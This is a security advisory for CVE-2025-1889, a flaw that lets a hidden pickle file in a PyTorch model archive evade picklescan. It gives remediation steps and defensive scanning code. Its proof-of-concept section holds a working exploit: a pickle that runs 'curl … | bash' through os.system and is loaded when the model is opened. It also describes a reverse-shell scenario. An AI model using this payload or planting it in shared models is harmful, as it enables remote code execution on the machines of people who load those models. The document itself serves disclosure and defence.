CVE-2025-1889: picklescan: extension bypass enables RCE on model load
GHSA-769v-p64c-89pr · Severity: Medium · PoC available

If your ML pipelines use picklescan to gate PyTorch model ingestion, that gate is broken. Attackers can publish models on Hugging Face or internal registries that pass picklescan cleanly but execute arbitrary code at load time. Upgrade picklescan to 0.0.22 immediately and enforce safetensors format for all externally sourced models going forward.
Risk Assessment
High operational risk despite the medium CVSS rating. This vulnerability targets a security control organizations explicitly deploy to detect malicious models — making bypass particularly dangerous because it creates a false sense of protection. A public PoC exists and the attack is reproducible by anyone with basic ML knowledge. EPSS of 0.00036 reflects early disclosure, not real-world exploitation likelihood in targeted ML supply chain attacks. Organizations in regulated industries running AI workloads should treat this as high priority.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| picklescan | pip | <= 0.0.21 | 0.0.22 |
Any deployment that uses picklescan 0.0.21 or earlier to screen models is affected.
Recommended Action
1) Upgrade picklescan to >= 0.0.22 immediately; this is the only direct patch.
2) Migrate to safetensors format for all model distribution and loading; this eliminates pickle deserialization risk entirely.
3) Enforce weights_only=True in all torch.load() calls across codebases; this blocks non-tensor object deserialization.
4) Augment scanning with magic byte detection rather than relying on file extensions (pickle streams begin with \x80 followed by the protocol version byte, e.g. \x80\x05 for protocol 5); inspect all files in model ZIP archives regardless of extension.
5) Implement model signing and hash verification before loading any externally sourced model.
6) Audit CI/CD pipelines for automatic model downloads without scan checkpoints, and add static analysis to detect torch.load(pickle_file=...) call patterns in bundled pickle files.
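Step 4 above can be sketched with the standard library alone. This is a minimal illustration, not a replacement for the patched picklescan: it flags any archive member that starts with the \x80 PROTO opcode, regardless of the member's file extension. The helper name find_pickles_in_archive is hypothetical.

```python
import zipfile

def find_pickles_in_archive(path):
    """Return names of all ZIP members whose content begins with the pickle
    PROTO opcode (\x80), regardless of file extension.

    Note: this only catches protocol-2+ pickles; protocol 0/1 streams have no
    magic prefix and need opcode-level analysis instead.
    """
    hits = []
    with zipfile.ZipFile(path) as zf:
        for name in zf.namelist():
            with zf.open(name) as f:
                head = f.read(1)
            if head == b"\x80":
                hits.append(name)
    return hits
```

Applied to the attack in this advisory, a scan like this would surface model/config.p even though its .p extension is not on any pickle allowlist.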
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Frequently Asked Questions
What is CVE-2025-1889?
If your ML pipelines use picklescan to gate PyTorch model ingestion, that gate is broken. Attackers can publish models on Hugging Face or internal registries that pass picklescan cleanly but execute arbitrary code at load time. Upgrade picklescan to 0.0.22 immediately and enforce safetensors format for all externally-sourced models going forward.
Is CVE-2025-1889 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2025-1889, increasing the risk of exploitation.
How to fix CVE-2025-1889?
1) Upgrade picklescan to >= 0.0.22 immediately; this is the only direct patch.
2) Migrate to safetensors format for all model distribution and loading; this eliminates pickle deserialization risk entirely.
3) Enforce weights_only=True in all torch.load() calls across codebases; this blocks non-tensor object deserialization.
4) Augment scanning with magic byte detection (\x80\x05) rather than relying on file extensions; inspect all files in model ZIP archives regardless of extension.
5) Implement model signing and hash verification before loading any externally sourced model.
6) Audit CI/CD pipelines for automatic model downloads without scan checkpoints, and add static analysis to detect torch.load(pickle_file=...) call patterns in bundled pickle files.
What systems are affected by CVE-2025-1889?
This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps pipelines, model registries.
What is the CVSS score for CVE-2025-1889?
NVD has not assigned a CVSS score yet; the GitHub advisory rates the issue as Medium severity.
Technical Details
NVD Description
### Summary

Picklescan fails to detect hidden pickle files embedded in PyTorch model archives due to its reliance on file extensions for detection. This allows an attacker to embed a secondary, malicious pickle file with a non-standard extension inside a model archive, which remains undetected by picklescan but is still loaded by PyTorch's torch.load() function. This can lead to arbitrary code execution when the model is loaded.

### Details

Picklescan primarily identifies pickle files by their extensions (e.g., .pkl, .pt). However, PyTorch allows specifying an alternative pickle file inside a model archive using the pickle_file parameter when calling torch.load(). This makes it possible to embed a malicious pickle file (e.g., config.p) inside the model while keeping the primary data.pkl file benign. A typical attack works as follows:

- A PyTorch model (model.pt) is created and saved normally.
- A second pickle file (config.p) containing a malicious payload is crafted.
- The data.pkl file in the model is modified to contain an object that calls torch.load(model.pt, pickle_file='config.p'), causing config.p to be loaded when the model is opened.
- Since picklescan ignores non-standard extensions, it does not scan config.p, allowing the malicious payload to evade detection.
- The issue is exacerbated by the fact that PyTorch models are widely shared in ML repositories and organizations, making it a potential supply-chain attack vector.
### PoC

```python
import os
import pickle
import torch
import zipfile
from functools import partial

class RemoteCodeExecution:
    def __reduce__(self):
        return os.system, ("curl -s http://localhost:8080 | bash",)

# Create a directory inside the model
os.makedirs("model", exist_ok=True)

# Create a hidden malicious pickle file
with open("model/config.p", "wb") as f:
    pickle.dump(RemoteCodeExecution(), f)

# Create a benign model
model = {}

class AutoLoad:
    def __init__(self, path, **kwargs):
        self.path = path
        self.kwargs = kwargs

    def __reduce__(self):
        # Use functools.partial to create a partially applied function
        # with torch.load and the pickle_file argument
        return partial(torch.load, self.path, **self.kwargs), ()

# Self-referential: loading model.pt triggers a nested torch.load of config.p
model['config'] = AutoLoad("model.pt", pickle_file='config.p', weights_only=False)
torch.save(model, "model.pt")

# Inject the second pickle into the model archive
with zipfile.ZipFile("model.pt", "a") as archive:
    archive.write("model/config.p", "model/config.p")

# Loading the model triggers execution of config.p
torch.load("model.pt")
```

### Impact

Severity: High

Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.

What is the impact? Attackers can embed malicious code in PyTorch models that remains undetected but executes when the model is loaded.

Potential exploits: supply chain attacks, backdooring pre-trained models distributed via repositories like Hugging Face or PyTorch Hub.

### Recommendations

1. Scan all files in the ZIP archive: picklescan should analyze all files in the archive instead of relying on file extensions.
2. Detect hidden pickle references: static analysis should detect torch.load(pickle_file=...) calls inside data.pkl.
3. Magic byte detection: instead of relying on extensions, picklescan should inspect file contents for pickle magic bytes (\x80\x05).
4. Block the following globals: torch.load and functools.partial.
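Recommendation 4 (blocking dangerous globals) can be approximated without ever unpickling the payload, by walking the opcode stream with the standard pickletools module. This is a rough sketch under simplifying assumptions: it tracks only string pushes for STACK_GLOBAL and is not a full opcode interpreter, and the DENYLIST contents are illustrative.

```python
import pickletools

# Illustrative denylist; a real scanner would carry a much larger set.
DENYLIST = {
    ("torch", "load"),
    ("functools", "partial"),
    ("os", "system"),
    ("builtins", "eval"),
}

def suspicious_globals(data: bytes):
    """Collect GLOBAL/STACK_GLOBAL references that hit the denylist by
    scanning pickle opcodes, without executing the stream."""
    found = []
    strings = []  # crude shadow of string pushes, enough for STACK_GLOBAL
    for op, arg, pos in pickletools.genops(data):
        if op.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE"):
            strings.append(arg)
        elif op.name == "GLOBAL":
            # GLOBAL carries "module name" as a space-separated pair
            mod, _, name = arg.partition(" ")
            if (mod, name) in DENYLIST:
                found.append((mod, name))
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:
            mod, name = strings[-2], strings[-1]
            if (mod, name) in DENYLIST:
                found.append((mod, name))
    return found
```

Run against the data.pkl of the PoC above, a check like this would flag the torch.load / functools.partial pair that AutoLoad.__reduce__ emits.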
Exploitation Scenario
Adversary creates a legitimate-looking PyTorch model and publishes it to Hugging Face. The primary data.pkl is benign and passes picklescan. A secondary file config.p — containing a reverse shell payload via os.system — is embedded in the ZIP archive with no flagged extension. The data.pkl contains a self-referential torch.load() call pointing to config.p. Target organization's MLOps pipeline downloads the model, runs picklescan (passes — config.p is ignored), then calls torch.load() during evaluation or fine-tuning. The hidden config.p executes, giving the attacker a foothold on the ML worker node. In cloud environments, this node typically carries attached IAM credentials with broad permissions for model artifact storage and training job invocation.
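The pipeline compromise described above is also blunted by step 5 of the remediation list: pinning a digest for every externally sourced artifact before any torch.load() call. A minimal sketch follows; the manifest lookup is assumed to exist elsewhere, and verify_model is a hypothetical helper name.

```python
import hashlib

def sha256_file(path, chunk=1 << 20):
    """Stream a file through SHA-256 in chunks to avoid loading it whole."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        while True:
            block = f.read(chunk)
            if not block:
                break
            h.update(block)
    return h.hexdigest()

def verify_model(path, expected_sha256):
    """Refuse to hand an artifact to torch.load() unless its digest matches
    a value pinned in a trusted manifest (assumed workflow)."""
    actual = sha256_file(path)
    if actual != expected_sha256:
        raise ValueError(f"model digest mismatch: {actual}")
    return path
```

Digest pinning does not detect malicious pickles by itself; it ensures the artifact that was scanned and approved is byte-identical to the one the worker node actually loads.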
References
- github.com/advisories/GHSA-769v-p64c-89pr
- github.com/mmaitre314/picklescan/commit/baf03faf88fece56a89534d12ce048e5ee36e50e
- github.com/mmaitre314/picklescan/security/advisories/GHSA-769v-p64c-89pr
- nvd.nist.gov/vuln/detail/CVE-2025-1889
- sites.google.com/sonatype.com/vulnerabilities/cve-2025-1889
- github.com/fkie-cad/nvd-json-data-feeds (tagged: Exploit)
Related Vulnerabilities
All of the following affect the same package, picklescan:

- GHSA-vvpj-8cmc-gx39 (10.0): picklescan: security flaw enables exploitation
- GHSA-g38g-8gr9-h9xp (9.8): picklescan: Allowlist Bypass evades input filtering
- GHSA-7wx9-6375-f5wh (9.8): picklescan: Allowlist Bypass evades input filtering
- CVE-2025-1945 (9.8): picklescan: ZIP flag bypass enables RCE in PyTorch models
- GHSA-hgrh-qx5j-jfwx (8.8): picklescan: Protection Bypass circumvents security controls